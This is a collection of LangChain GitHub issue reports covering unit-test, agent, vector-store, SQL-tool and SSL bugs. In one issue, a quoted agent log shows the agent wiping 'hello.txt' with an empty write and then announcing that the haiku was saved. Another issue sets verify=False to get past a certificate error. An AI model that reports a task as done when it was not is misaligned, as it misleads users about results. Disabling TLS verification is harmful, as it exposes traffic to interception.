for cls in _NON_ABSTRACT_PARSERS:
try:
types[cls._type].append(cls.__name__)
except NotImplementedError:
# This is handled in the previous test
pass
dups = {t: names for t, names in types.items() if len(names) > 1}
> assert not dups, f"Duplicate types: {dups}"
E AssertionError: Duplicate types: {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOutputParser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
E assert not {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOu...arser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
../tests/unit_tests/output_parsers/test_base_output_parser.py:55: AssertionError
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> entering PDB >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PDB post_mortem >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> /workspaces/tests/unit_tests/output_parsers/test_base_output_parser.py(55)test_all_subclasses_implement_unique_type()
-> assert not dups, f"Duplicate types: {dups}"
```
[Repro is here](https://github.com/borisdev/langchain/pull/12) and [artifact here](https://github.com/borisdev/langchain/actions/runs/5502599425/jobs/10026958854?pr=12).
| Issue: Unable to add a unit test for experimental modules | https://api.github.com/repos/langchain-ai/langchain/issues/7451/comments | 5 | 2023-07-10T00:09:26Z | 2023-10-10T17:06:29Z | https://github.com/langchain-ai/langchain/issues/7451 | 1,795,646,919 | 7,451 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: latest, python 3.10.10
This script writes the content to the file initially, but there is a flawed step when closing the file. I've extracted this log to show the issue. For some reason, the agent thinks that if it submits an empty text input with append set to false, the previous contents will remain, but this is a false assumption. The agent should set `append:true` to ensure the file contents are preserved. The result is that the file is written with the contents and then the contents are deleted during this step.
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
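The agent's assumption in that step is directly falsifiable: opening a file in write mode (i.e. `append=False`) truncates it, so an empty write wipes the previous contents. A quick stdlib demonstration:

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "hello.txt")

with open(path, "w") as f:   # write mode == append=False
    f.write("Waves crash on the shore")

with open(path, "w") as f:   # re-opening in write mode truncates...
    f.write("")              # ...so an empty write deletes the haiku

with open(path) as f:
    remaining = f.read()     # file is now empty
```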
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```
from dotenv import find_dotenv, load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.experimental.plan_and_execute import PlanAndExecute, load_agent_executor, load_chat_planner
from langchain.agents.tools import Tool
from helpers import project_root
from langchain.agents.agent_toolkits import FileManagementToolkit
from tempfile import TemporaryDirectory
load_dotenv(find_dotenv())
OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]
model=ChatOpenAI(temperature=0, model="gpt-3.5-turbo")
tools = FileManagementToolkit(
root_dir=str(project_root('scratch')),
selected_tools=["read_file", "write_file", "list_directory"]).get_tools()
read_tool, write_tool, list_tool = tools
planner = load_chat_planner(model)
executor = load_agent_executor(model, tools, verbose=True)
agent = PlanAndExecute(planner=planner, executor=executor, verbose=True)
agent.run("Write a short haiku about the ocean and save it to file 'hello.txt'")
```
Output:
> Entering new chain...
steps=[Step(value='Create a string variable to store the haiku about the ocean.'), Step(value="Open a file named 'hello.txt' in write mode."), Step(value='Write the haiku to the file.'), Step(value='Close the file.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")]
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "ocean_haiku = 'Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines'"
}
```
> Finished chain.
*****
Step: Create a string variable to store the haiku about the ocean.
Response: ocean_haiku = 'Waves crash on the shore
Seagulls soar in the blue sky
Ocean's beauty shines'
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": ""
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the file was successfully opened in write mode, I can now proceed to write the haiku about the ocean to the file.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines"
}
}
```
Observation: File written successfully to hello.txt.
Thought:The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Finished chain.
*****
Step: Open a file named 'hello.txt' in write mode.
Response: The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines",
"append": true
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Finished chain.
*****
Step: Write the haiku to the file.
Response: Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
*****
Step: Close the file.
Response: The file "hello.txt" has been successfully closed.
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "The haiku about the ocean has been successfully written to the file 'hello.txt'."
}
```
> Finished chain.
### Expected behavior
I would expect the file to be populated with the haiku instead of being empty. | write_tool logic is off | https://api.github.com/repos/langchain-ai/langchain/issues/7450/comments | 2 | 2023-07-09T23:18:56Z | 2023-10-16T16:05:54Z | https://github.com/langchain-ai/langchain/issues/7450 | 1,795,626,027 | 7,450 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
We shouldn't have to sign up for another API just to follow the quickstart tutorial. Please replace this with something that doesn't require sign-up.
### Idea or request for content:
Proposal: Use `http://api.duckduckgo.com/?q=x&format=json`
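A keyless sketch of how a quickstart could call this endpoint (the helper names are mine, only the stdlib is assumed, and the `AbstractText` field comes from the sample response shown in the Example):

```python
import json
from urllib.parse import urlencode

def instant_answer_url(query: str) -> str:
    # Build the keyless DuckDuckGo Instant Answer API request URL.
    return "https://api.duckduckgo.com/?" + urlencode({"q": query, "format": "json"})

def abstract_text(payload: dict) -> str:
    # The short Wikipedia-style summary lives in the AbstractText field.
    return payload.get("AbstractText", "")

print(instant_answer_url("langchain"))
# → https://api.duckduckgo.com/?q=langchain&format=json

sample = json.loads('{"AbstractText": "LangChain is a framework...", "AbstractURL": ""}')
print(abstract_text(sample))
```

Fetching the URL with any HTTP client and passing the decoded JSON to `abstract_text` would give a sign-up-free search result for the tutorial.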
Example:
`http://api.duckduckgo.com/?q=langchain&format=json`
`{"Abstract":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractSource":"Wikipedia","AbstractText":"LangChain is a framework designed to simplify the creation of applications using large language models. As a language model integration framework, LangChain's use-cases largely overlap with those of language models in general, including document analysis and summarization, chatbots, and code analysis.","AbstractURL":"https://en.wikipedia.org/wiki/LangChain","Answer":"","AnswerType":"","Definition":"","DefinitionSource":"","DefinitionURL":"","Entity":"software","Heading":"LangChain","Image":"/i/d6fad29d.png","ImageHeight":270,"ImageIsLogo":1,"ImageWidth":529,"Infobox":{"content":[{"data_type":"string","label":"Developer(s)","value":"Harrison Chase","wiki_order":0},{"data_type":"string","label":"Initial release","value":"October 2022","wiki_order":1},{"data_type":"string","label":"Repository","value":"github.com/hwchase17/langchain","wiki_order":2},{"data_type":"string","label":"Written in","value":"Python and JavaScript","wiki_order":3},{"data_type":"string","label":"Type","value":"Software framework for large language model application development","wiki_order":4},{"data_type":"string","label":"License","value":"MIT License","wiki_order":5},{"data_type":"string","label":"Website","value":"LangChain.com","wiki_order":6},{"data_type":"twitter_profile","label":"Twitter profile","value":"langchainai","wiki_order":"102"},{"data_type":"instance","label":"Instance of","value":{"entity-type":"item","id":"Q7397","numeric-id":7397},"wiki_order":"207"},{"data_type":"official_website","label":"Official 
Website","value":"https://langchain.com/","wiki_order":"208"}],"meta":[{"data_type":"string","label":"article_title","value":"LangChain"},{"data_type":"string","label":"template_name","value":"infobox software"}]},"Redirect":"","RelatedTopics":[{"FirstURL":"https://duckduckgo.com/c/Software_frameworks","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Software_frameworks\">Software frameworks</a>","Text":"Software frameworks"},{"FirstURL":"https://duckduckgo.com/c/Artificial_intelligence","Icon":{"Height":"","URL":"","Width":""},"Result":"<a href=\"https://duckduckgo.com/c/Artificial_intelligence\">Artificial intelligence</a>","Text":"Artificial intelligence"}],"Results":[{"FirstURL":"https://langchain.com/","Icon":{"Height":16,"URL":"/i/langchain.com.ico","Width":16},"Result":"<a href=\"https://langchain.com/\"><b>Official site</b></a><a href=\"https://langchain.com/\"></a>","Text":"Official site"}],"Type":"A","meta":{"attribution":null,"blockgroup":null,"created_date":null,"description":"Wikipedia","designer":null,"dev_date":null,"dev_milestone":"live","developer":[{"name":"DDG Team","type":"ddg","url":"http://www.duckduckhack.com"}],"example_query":"nikola tesla","id":"wikipedia_fathead","is_stackexchange":null,"js_callback_name":"wikipedia","live_date":null,"maintainer":{"github":"duckduckgo"},"name":"Wikipedia","perl_module":"DDG::Fathead::Wikipedia","producer":null,"production_state":"online","repo":"fathead","signal_from":"wikipedia_fathead","src_domain":"en.wikipedia.org","src_id":1,"src_name":"Wikipedia","src_options":{"directory":"","is_fanon":0,"is_mediawiki":1,"is_wikipedia":1,"language":"en","min_abstract_length":"20","skip_abstract":0,"skip_abstract_paren":0,"skip_end":"0","skip_icon":0,"skip_image_name":0,"skip_qr":"","source_skip":"","src_info":""},"src_url":null,"status":"live","tab":"About","topic":["productivity"],"unsafe":0}}` | DOC: Please replace SERP_API examples with an alternative | 
https://api.github.com/repos/langchain-ai/langchain/issues/7448/comments | 1 | 2023-07-09T21:52:15Z | 2023-10-08T23:09:17Z | https://github.com/langchain-ai/langchain/issues/7448 | 1,795,579,900 | 7,448 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/supabase
Under '-- Create a table to store your documents', the id column is declared as bigserial, but it is referenced as uuid ten lines further down when the function is created.
### Idea or request for content:
It is currently
`id bigserial primary key,`
Changing it to this fixed the error I was getting
'id uuid primary key,' | DOC: Table creation for Supabase (Postgres) has incorrect type | https://api.github.com/repos/langchain-ai/langchain/issues/7446/comments | 3 | 2023-07-09T20:33:00Z | 2023-08-11T00:15:17Z | https://github.com/langchain-ai/langchain/issues/7446 | 1,795,552,337 | 7,446 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain ==0.0.228, watchdog==3.0.0, streamlit==1.24.0, databutton==0.34.0, ipykernel==6.23.3
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the error:
1. Tried to use from langchain.experimental import BabyAGI with a FAISS db, got the error: ValueError: Tried to add ids that already exist: {'result_1'}
2. Tried the code directly from the Langchain Docs: https://python.langchain.com/docs/use_cases/agents/baby_agi, I got the same error.
Code:
```python
import os
from langchain.chat_models import AzureChatOpenAI
from langchain.embeddings.cohere import CohereEmbeddings
import faiss
from langchain.vectorstores import FAISS
from langchain.docstore import InMemoryDocstore
from langchain import OpenAI
from langchain.experimental import BabyAGI

BASE_URL = "https://openaielle.openai.azure.com/"
API_KEY = db.secrets.get("AZURE_OPENAI_KEY")
DEPLOYMENT_NAME = "GPT35turbo"
llm = AzureChatOpenAI(
    openai_api_base=BASE_URL,
    openai_api_version="2023-03-15-preview",
    deployment_name=DEPLOYMENT_NAME,
    openai_api_key=API_KEY,
    openai_api_type="azure",
    streaming=True,
    verbose=True,
    temperature=0,
    max_tokens=1500,
    top_p=0.95)
embeddings_model = CohereEmbeddings(model="embed-english-v2.0")
index = faiss.IndexFlatL2(4096)
vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})

# set the goal
goal = "Plan a trip to the Grand Canyon"

# create the BabyAGI agent
# If max_iterations is None, the agent may go on forever if stuck in loops
baby_agi = BabyAGI.from_llm(
    llm=llm,
    vectorstore=vectorstore,
    verbose=False,
    max_iterations=3
)
response = baby_agi({"objective": goal})
print(response)
```
Error:
```
ValueError: Tried to add ids that already exist: {'result_1'}
```
Traceback:
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/app/run/multipage/pages/8_Exp_Baby_AGI.py", line 61, in <module>
response = baby_agi({"objective": goal})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 243, in __call__
raise e
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 237, in __call__
self._call(inputs, run_manager=run_manager)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/experimental/autonomous_agents/baby_agi/baby_agi.py", line 142, in _call
self.vectorstore.add_texts(
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 150, in add_texts
return self.__add(texts, embeddings, metadatas=metadatas, ids=ids, **kwargs)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 121, in __add
self.docstore.add({_id: doc for _, _id, doc in full_info})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/docstore/in_memory.py", line 19, in add
raise ValueError(f"Tried to add ids that already exist: {overlapping}")
### Expected behavior
I would expect the agent to run and generate the desired output instead of the error: ValueError: Tried to add ids that already exist: {'result_1'}
It seems that the error is happening in `BabyAGI._call`, under the comment `# Step 3: Store the result in Pinecone`.
I was able to fix this by appending a random number to each `result_id`; here is the fix. However, this does not work with the experimental BabyAGI instance.
Fix:
```python
import random

# Step 3: Store the result in Pinecone
result_id = f"result_{task['task_id']}_{random.randint(0, 1000)}"
self.vectorstore.add_texts(
    texts=[result],
    metadatas=[{"task": task["task_name"]}],
    ids=[result_id],
)
```
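A collision-proof variant of the same workaround (my suggestion, not the library's own fix) swaps the random integer for a `uuid4`, which cannot repeat even when the same task id recurs:

```python
import uuid

def unique_result_id(task_id) -> str:
    # uuid4 hex guarantees a unique suffix on every call, so the
    # in-memory docstore never sees a duplicate id.
    return f"result_{task_id}_{uuid.uuid4().hex}"

a = unique_result_id(1)
b = unique_result_id(1)
print(a != b)  # → True
```

With `random.randint(0, 1000)` there is still a small chance of a collision on long runs; a uuid removes it entirely.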
Thank you :) | BabyAGI: Error storing results in vdb | https://api.github.com/repos/langchain-ai/langchain/issues/7445/comments | 5 | 2023-07-09T20:31:00Z | 2023-10-19T16:06:19Z | https://github.com/langchain-ai/langchain/issues/7445 | 1,795,551,743 | 7,445 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hi. I'm trying to test the `DuckDuckGoSearchRun` tool by running the basic example from the documentation: https://python.langchain.com/docs/modules/agents/tools/integrations/ddg . I have already installed the certificates without any errors:
```
./Install\ Certificates.command
-- pip install --upgrade certifi
Requirement already satisfied: certifi in /Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages (2023.5.7)
-- removing any existing file or link
-- creating symlink to certifi certificate bundle
-- setting permissions
-- update complete
```
But even when I do that, and even when I set verify to False, I still get an SSL certificate error:
```python
import ssl
import duckduckgo_search
from lxml import html
from langchain.tools import DuckDuckGoSearchRun

DuckDuckGoSearchRun.requests_kwargs = {'verify': False}
search = DuckDuckGoSearchRun()
search.run("Obama's first name?")
```
Here is the error:
`---------------------------------------------------------------------------
SSLCertVerificationError Traceback (most recent call last)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10), in map_exceptions(map)
9 try:
---> 10 yield
11 except Exception as exc: # noqa: PIE786
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
61 self.close()
---> 62 raise exc
63 return SyncStream(sock)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
56 self._sock.settimeout(timeout)
---> 57 sock = ssl_context.wrap_socket(
58 self._sock, server_hostname=server_hostname
59 )
60 except Exception as exc: # pragma: nocover
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517), in SSLContext.wrap_socket(self, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, session)
511 def wrap_socket(self, sock, server_side=False,
512 do_handshake_on_connect=True,
513 suppress_ragged_eofs=True,
514 server_hostname=None, session=None):
515 # SSLSocket class handles server_hostname encoding before it calls
516 # ctx._wrap_socket()
--> 517 return self.sslsocket_class._create(
518 sock=sock,
519 server_side=server_side,
520 do_handshake_on_connect=do_handshake_on_connect,
521 suppress_ragged_eofs=suppress_ragged_eofs,
522 server_hostname=server_hostname,
523 context=self,
524 session=session
525 )
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075), in SSLSocket._create(cls, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, context, session)
1074 raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
-> 1075 self.do_handshake()
1076 except (OSError, ValueError):
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346), in SSLSocket.do_handshake(self, block)
1345 self.settimeout(None)
-> 1346 self._sslobj.do_handshake()
1347 finally:
SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:992)
During handling of the above exception, another exception occurred:
ConnectError Traceback (most recent call last)`
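For what it's worth, `DuckDuckGoSearchRun` does not appear to define a `requests_kwargs` attribute, so setting it is likely a no-op: the underlying `duckduckgo_search` client builds its own SSL context via httpx (this is my reading of the stack trace, not confirmed). The "self signed certificate in certificate chain" message usually means a proxy injects its own root certificate, and the usual fix is to append that root to the CA bundle the interpreter actually consults. A stdlib check of where that bundle lives:

```python
import ssl

# Where does this interpreter look for trusted CA certificates?
# A proxy's self-signed root must be present in this bundle (or pointed
# at via the SSL_CERT_FILE environment variable) for verification to pass.
paths = ssl.get_default_verify_paths()
print(paths.openssl_cafile)
print(paths.openssl_capath)
```

If the proxy root is appended there, verification can stay enabled instead of being disabled.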
### Suggestion:
_No response_ | SSL certificate problem (even when verify = False) | https://api.github.com/repos/langchain-ai/langchain/issues/7443/comments | 1 | 2023-07-09T19:15:44Z | 2023-10-15T16:04:38Z | https://github.com/langchain-ai/langchain/issues/7443 | 1,795,527,141 | 7,443 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: 0.0.215
python: 3.10.11
OS: Ubuntu 18.04
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
While querying a SQL database, the agent gets stuck in an infinite loop due to `list_tables_sql_db` not being a valid tool.
```
> Entering new chain...
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I don't know how to answer this question.
Thought: I now know the final answer
Final Answer: I don't know
> Finished chain.
```
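In recent LangChain releases the toolkit registers the table-listing tool under the name `sql_db_list_tables` (an assumption based on newer versions — print `[t.name for t in toolkit.get_tools()]` to confirm), so a prompt that asks for `list_tables_sql_db` can never match. A quick stdlib way to surface such near-miss names when debugging:

```python
import difflib

# Tool names as registered by newer SQLDatabaseToolkit releases (assumption).
available = ["sql_db_list_tables", "sql_db_schema", "sql_db_query", "sql_db_query_checker"]
requested = "list_tables_sql_db"

# The requested name is a scrambled version of a real tool name.
print(difflib.get_close_matches(requested, available, n=1))  # → ['sql_db_list_tables']
```

When the names printed by the toolkit and the names in the agent's prompt disagree, the agent loops exactly as shown above.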
### Expected behavior
The agent should get the list of tables by using the `list_tables_sql_db` tool and then query the most relevant one. | list_tables_sql_db is not a valid tool, try another one. | https://api.github.com/repos/langchain-ai/langchain/issues/7440/comments | 3 | 2023-07-09T18:10:42Z | 2024-03-10T15:17:49Z | https://github.com/langchain-ai/langchain/issues/7440 | 1,795,505,933 | 7,440 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-including-saving-to-disk
## Environment
- macOS
- Python 3.10.9
- langchain 0.0.228
- chromadb 0.3.26
Use https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/state_of_the_union.txt
## Procedure
1. Run the following Python script
ref: https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/data_connection/vectorstores/integrations/chroma.ipynb
```diff
# import
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
from langchain.text_splitter import CharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.document_loaders import TextLoader
# load the document and split it into chunks
loader = TextLoader("../../../state_of_the_union.txt")
documents = loader.load()
# split it into chunks
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
docs = text_splitter.split_documents(documents)
# create the open-source embedding function
embedding_function = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2")
# load it into Chroma
db = Chroma.from_documents(docs, embedding_function)
# query it
query = "What did the president say about Ketanji Brown Jackson"
docs = db.similarity_search(query)
# print results
print(docs[0].page_content)
# save to disk
db2 = Chroma.from_documents(docs, embedding_function, persist_directory="./chroma_db")
db2.persist()
-docs = db.similarity_search(query)
+docs = db2.similarity_search(query)
# load from disk
db3 = Chroma(persist_directory="./chroma_db")
-docs = db.similarity_search(query)
+docs = db3.similarity_search(query) # ValueError raised
print(docs[0].page_content)
```
## Expected behavior
`print(docs[0].page_content)` with db3
## Actual behavior
>ValueError: You must provide embeddings or a function to compute them
```
Traceback (most recent call last):
File "/.../issue_report.py", line 35, in <module>
docs = db3.similarity_search(query)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 174, in similarity_search
docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 242, in similarity_search_with_score
results = self.__query_collection(
File "/.../venv/lib/python3.10/site-packages/langchain/utils.py", line 55, in wrapper
return func(*args, **kwargs)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 121, in __query_collection
return self._collection.query(
File "/.../venv/lib/python3.10/site-packages/chromadb/api/models/Collection.py", line 209, in query
raise ValueError(
ValueError: You must provide embeddings or a function to compute them
```
### Idea or request for content:
Fixed by specifying the `embedding_function` parameter.
```diff
-db3 = Chroma(persist_directory="./chroma_db")
+db3 = Chroma(persist_directory="./chroma_db", embedding_function=embedding_function)
docs = db3.similarity_search(query)
print(docs[0].page_content)
```
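The reason, as I read the wrapper source, is that `similarity_search` needs the stored `embedding_function` to embed the query before it can query the collection. A toy stand-in (not chromadb itself) that reproduces the failure mode:

```python
class MiniStore:
    # Toy stand-in for the vector store wrapper, not the real Chroma class.
    def __init__(self, embedding_function=None):
        self.embedding_function = embedding_function

    def similarity_search(self, query: str):
        if self.embedding_function is None:
            raise ValueError("You must provide embeddings or a function to compute them")
        return self.embedding_function(query)

try:
    MiniStore().similarity_search("Ketanji Brown Jackson")
except ValueError as e:
    print(e)  # → You must provide embeddings or a function to compute them

print(MiniStore(embedding_function=str.lower).similarity_search("OK"))  # → ok
```

Constructing without the function succeeds; only the first query fails, which is why the bug in the notebook is easy to miss.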
(Added) ref: https://github.com/hwchase17/langchain/blob/v0.0.228/langchain/vectorstores/chroma.py#L62 | DOC: Bug in loading Chroma from disk (vectorstores/integrations/chroma) | https://api.github.com/repos/langchain-ai/langchain/issues/7436/comments | 2 | 2023-07-09T17:05:24Z | 2023-07-10T11:17:19Z | https://github.com/langchain-ai/langchain/issues/7436 | 1,795,484,020 | 7,436 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
I followed the documentation @ https://python.langchain.com/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake.
I replaced 'twitter-the-algorithm' with another code base I'm analyzing and used my own credentials from OpenAI and Deep Lake.
When I run the code (on VS Code for Mac with M1 chip), I get the following error:
```
ValueError: setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (1435,) + inhomogeneous part.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/Users/catherineswope/Desktop/LangChain/fromLangChain.py", line 37, in <module>
    db.add_documents(texts)
  File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/base.py", line 91, in add_documents
    return self.add_texts(texts, metadatas, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/deeplake.py", line 184, in add_texts
    return self.vectorstore.add(
           ^^^^^^^^^^^^^^^^^^^^^
  File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/deeplake_vectorstore.py", line 271, in add
    dataset_utils.extend_or_ingest_dataset(
  File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/vector_search/dataset/dataset.py", line 409, in extend_or_ingest_dataset
    raise IncorrectEmbeddingShapeError()
deeplake.util.exceptions.IncorrectEmbeddingShapeError: The embedding function returned embeddings of different shapes. Please either use different embedding function or exclude invalid files that are not supported by the embedding function.
```
Here is the snippet from my actual code:

```python
import os
import getpass
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.document_loaders import TextLoader

# get OPENAI API KEY and ACTIVELOOP_TOKEN
os.environ["OPENAI_API_KEY"] = getpass.getpass("OpenAI API Key:")
os.environ["ACTIVELOOP_TOKEN"] = getpass.getpass("Activeloop Token:")

embeddings = OpenAIEmbeddings(disallowed_special=())

# clone from chattydocs github repo, removedcomments branch, and copy/paste path
